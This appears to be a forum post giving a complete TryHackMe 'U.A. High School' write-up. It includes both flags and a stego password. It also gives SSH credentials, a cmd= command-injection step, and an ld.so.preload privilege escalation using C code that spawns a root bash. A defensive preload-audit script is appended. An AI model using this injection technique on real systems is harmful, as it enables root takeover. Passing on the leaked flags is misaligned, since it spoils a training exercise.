Let’s discuss U.A. High School
.
OMG no attack vector
Directory scanning, subdomain enum, parameter fuzzing, nothing gave a result
The TryHackMe staff are not able to classify challenges
A fantasy room based on an anime. It shouldn’t even be on TryHackMe. It’s just designed to waste people’s time. I’ll share the flags and a write-up here to save you time. Please dislike the room to show that you deserve better ones
User Flag: THM{W3lC0m3_D3kU_1A_0n3f0rAll??}
Root Flag: THM{Y0U_4r3_7h3_NUm83r_1_H3r0}
- Execute the command via /assets/index.php?cmd=ls (wtf!!)
- Find the hidden image and fix its magic bytes.
- Use steghide to extract the data inside it. Password: AllmightForEver!!!
- Using the following credentials, log in via SSH: deku:One?For?All_!!one1/A
- Get the user flag.
Check sudo -l
deku@myheroacademia:/tmp$ sudo -l
[sudo] password for deku:
Matching Defaults entries for deku on myheroacademia:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User deku may run the following commands on myheroacademia:
(ALL) /opt/NewComponent/feedback.sh
deku@myheroacademia:/tmp$ sudo /opt/NewComponent/feedback.sh
Hello, Welcome to the Report Form
This is a way to report various problems
Developed by
The Technical Department of U.A.
Enter your feedback:
asd > test.txt
Notice that you can write files as root. We can use this to escalate privileges.
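#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>   /* unlink, setgid, setuid */

/* Runs when the dynamic loader maps this library (built with -nostartfiles). */
void _init() {
    unlink("/etc/ld.so.preload");   /* remove the preload entry so later processes start normally */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
// cd /tmp
// gcc -fPIC -shared -o pe.so pe.c -nostartfiles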
After compiling and transferring the library, copy it to /tmp and execute any binary with the SUID bit. I ran sudo to trigger the loading of the preload library.
deku@myheroacademia:/tmp$ sudo /opt/NewComponent/feedback.sh
Hello, Welcome to the Report Form
This is a way to report various problems
Developed by
The Technical Department of U.A.
Enter your feedback:
/tmp/pe.so > /etc/ld.so.preload
Feedback successfully saved.
deku@myheroacademia:/tmp$ /usr/bin/sudo
root@myheroacademia:/tmp# cd /root
root@myheroacademia:/root# ls
root.txt snap
root@myheroacademia:/root# cat root.txt
For an easier privilege escalation technique, you can also check this write-up.
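On the defensive side, the step above works because every dynamically linked process, SUID binaries included, loads whatever /etc/ld.so.preload lists. The check below is an added example, not part of the original posts: it audits a preload list for entries that are missing, not owned by root, or writable by other users. The function name audit_preload and the TRUSTED_UID override are hypothetical, and it assumes Linux with GNU stat.

```shell
# Added example: audit a glibc preload list for entries a non-root user could control.
# Usage: audit_preload [FILE]   (FILE defaults to /etc/ld.so.preload)
# Prints one finding per line and returns 1 if anything was found, 0 otherwise.
# TRUSTED_UID (hypothetical override, default 0) exists only so the check can be tested.
audit_preload() {
    file="${1:-/etc/ld.so.preload}"
    trusted="${TRUSTED_UID:-0}"
    [ -e "$file" ] || return 0                 # an absent preload file is the normal state
    findings=$(
        # strip comments, then split on the separators used in preload lists
        sed 's/#.*//' "$file" | tr ': \t' '\n\n\n' |
        while IFS= read -r entry || [ -n "$entry" ]; do
            [ -n "$entry" ] || continue
            if [ ! -e "$entry" ]; then
                echo "MISSING $entry"
                continue
            fi
            # check both the library and the directory that holds it
            for path in "$entry" "$(dirname "$entry")"; do
                set -- $(stat -L -c '%u %a' "$path")    # $1 = owner uid, $2 = octal mode
                [ "$1" = "$trusted" ] || echo "UNTRUSTED_OWNER $path (uid $1)"
                [ $(( 0$2 & 022 )) -eq 0 ] || echo "WRITABLE_BY_OTHERS $path (mode $2)"
            done
        done
    )
    if [ -n "$findings" ]; then
        printf '%s\n' "$findings"
        return 1
    fi
    return 0
}
```

An entry such as the /tmp/pe.so line from the session above would be reported because /tmp is writable by other users, and because the file is missing once the library has unlinked the preload list and been cleaned up.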
Why is the /assets path so tricky? Really frustrating!